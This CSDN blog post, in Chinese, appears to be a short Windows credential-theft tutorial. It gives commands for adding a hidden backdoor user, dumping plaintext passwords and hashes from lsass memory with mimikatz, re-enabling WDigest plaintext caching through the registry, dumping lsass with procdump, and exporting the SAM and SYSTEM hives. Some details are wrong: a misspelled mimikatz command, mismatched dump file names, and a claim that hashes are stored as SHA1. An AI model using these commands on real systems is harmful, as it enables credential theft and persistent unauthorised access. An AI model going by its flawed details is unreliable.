windows用户权限和认证

文章介绍了如何在Windows系统中创建一个隐藏用户,并详细阐述了Windows密码的存储机制。重点讨论了mimikatz工具的使用,包括通过Sekurlsa模块提取内存中的密码信息,以及如何通过修改注册表设置来抓取Win10及更高版本系统的明文密码。此外,还提到了使用procdump配合mimikatz抓取密码和通过SAM表获取密码hash的方法。
摘要由CSDN通过智能技术生成

创建隐藏用户

net user zzz$ 123456 /add  //创建一个名为zzz,密码为123456的隐藏用户 

Windows系统的密码

Windows登录密码永远不会以其原始形式存储,并始终加密。它们存储在C:/WINDOWS/SYSTEM32/config(假设安装在C盘中的Windows)文件夹中。的。 对于Windows密码以外的密码,其存储和加密取决于创建这些密码的应用程序。它们可能驻留在您的计算机上或远程位置。

mimikatz工具的使用

使用管理员运行mimikatz

Privilege::dubug  //提供mimikatz的权限
Sekurlsa::logonPasswords  //通过Sekurlsa模块,提取内存中的账号密码信息

通过lsass进程提取的密码。lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码。

Mimikatz提取用户凭证功能,其主要集中在sekurlsa模块,该模块又包含很多子模块,如msv,wdigest,kerberos等。如上面演示的抓取明文密码的sekurlsa::logonpasswords模块。
使用这些子模块可以提取相应的用户凭证,如
sekurlsa::msv提取ntlm hash凭证;
sekurlsa::wdigest提取用户密码明文;
sekurlsa::kerberos提取域账户凭证。

当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码
1、通过修改注册表的方式抓取明文。cmd修改注册表命令

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f 

重启或用户重新登录后,使用mimikatz常规操作即可成功抓取明文密码 可以使用命令logoff注销该账户。

改回注册表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

2、mimikatz配合procdump抓取密码。

procdump.exe -accepteula -ma lsass.exe testzzz.dmp 

在该目录下就会生成一个testzzz.dmp文件。

sekurlsa::minidump testdgm.dmp  //提取指定dmp文件 
sekurlsa::logonPasswords full  //执行提取 

3、SAM表获取hash

reg save HKLM\SYSTEM SYSTEM 
reg save HKLM\SAM SAM  //导出SAM数据 
lsadump::sam /sam:SAM /system:SYSTEM  //使用mimikatz提取hash 

创建新用户test密码123456,切换登录后。再切换回原账号,即可查看到该账户的信息,密码保存为SHA1

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值